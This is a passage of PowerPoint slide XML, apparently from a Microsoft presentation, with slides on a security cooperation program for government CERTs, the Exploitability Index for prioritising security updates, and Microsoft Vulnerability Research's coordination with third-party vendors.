      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50195" name="Picture 2" descr="\\eventsql\dvd\Online_ART\DVD_ART34\Artwork_Imagery\Icons - Illustrations\_MSN ICONS\MSN icon envelope email mail letter.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="5105400"/>
            <a:ext cx="1371600" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">
    <p:fad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8574" y="341401"/>
            <a:ext cx="8763000" cy="1883593"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" smtClean="0"/>
              <a:t>Security Cooperation Program - CERTs</a:t>
            </a:r>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr smtClean="0"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487363" y="1447800"/>
            <a:ext cx="8183562" cy="3743325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Special program for Government CERTs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="623888" lvl="1" indent="-223838" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>incident response &amp; Education information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="623888" lvl="1" indent="-223838" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access to resources for support, training, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="623888" lvl="1" indent="-223838" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access to the MSRA security portal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="106363" indent="-223838" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reduced requirement simplify membership</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="623888" lvl="1" indent="-223838" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access to MSRA resource including the MSRA Summit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="623888" lvl="1" indent="-223838" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fad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hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Exploitability Index</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="7924800" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="339725" indent="-339725" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Additional information to help customers prioritize the security updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Designed to give guidance on likelihood of functional exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Released each month as part of a Security Bulletin Summary from Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="339725" indent="-339725" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Developed based on watching trends in the ecosystem </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fad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1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="-152400"/>
          <a:ext cx="9144000" cy="6781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6" name="Diagram 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4572000"/>
          <a:ext cx="9144000" cy="29972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pic>
        <p:nvPicPr>
          <p:cNvPr id="53252" name="Picture 3" descr="D:\DVD_ART34\Artwork_Imagery\Shapes\Arrows\Blue Gradient Collection\arrow 0 blue shadow arrow short.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="4495800"/>
            <a:ext cx="6781800" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fad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5351" y="160638"/>
            <a:ext cx="7467600" cy="729049"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Understanding the Index</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54275" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="29517" t="33156" r="31247" b="56746"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1143000"/>
            <a:ext cx="8763000" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Isosceles Triangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="2438400"/>
            <a:ext cx="2133600" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3492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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533400" y="3124200"/>
          <a:ext cx="8077200" cy="34290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0069" y="284207"/>
            <a:ext cx="7463481" cy="790832"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Microsoft Vulnerability Research</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="609600"/>
          <a:ext cx="8458200" cy="32305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Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3276600"/>
            <a:ext cx="2895600" cy="4683125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" baseline="30000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> party vendors w/ broadest impact to our customers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Collect ongoing field data to spot trends that determine how &amp; when to expand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="3276600"/>
            <a:ext cx="3581400" cy="4683125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>From w/in Microsoft </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="722313" lvl="1" indent="-273050" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Found thru SDL tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="722313" lvl="1" indent="-273050" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Found by individuals w/in  security teams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>From external finders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="722313" lvl="1" indent="-273050" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Report a “Microsoft issue” that is 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="30000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> party issue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="722313" lvl="1" indent="-273050" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Report blended threats that involve MS &amp; 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="30000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> party</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55302" name="Picture 4" descr="D:\DVD_ART34\Artwork_Imagery\Icons - Illustrations\Misc\faucet.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="914400"/>
            <a:ext cx="1309688" cy="895350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55303" name="Picture 5" descr="D:\DVD_ART34\Artwork_Imagery\Icons - Illustrations\Misc\on target dart hit the targeted bullseye darts.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="990600"/>
            <a:ext cx="1204913" cy="862013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55304" name="Picture 8" descr="D:\DVD_ART34\Artwork_Imagery\Shapes\Arrows\Curved\seamless computing arrows blue.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="838200"/>
            <a:ext cx="2514600" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55305" name="Picture 2" descr="D:\DVD_ART34\Artwork_Imagery\Icons - Illustrations\_WINDOWS VISTA ICONS\Security windows secure safe.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="2590800"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55306" name="Picture 2" descr="D:\DVD_ART34\Artwork_Imagery\Icons - Illustrations\_WINDOWS VISTA ICONS\Security windows secure safe.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="838200"/>
            <a:ext cx="838200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="3657600"/>
            <a:ext cx="2971800" cy="4683125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Proactive protection of customers on our platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Work with other vendors to improve security for all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Evolve our security practices with the customer in mind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="419100" indent="-382588" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fade/>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03" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr smtClean="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
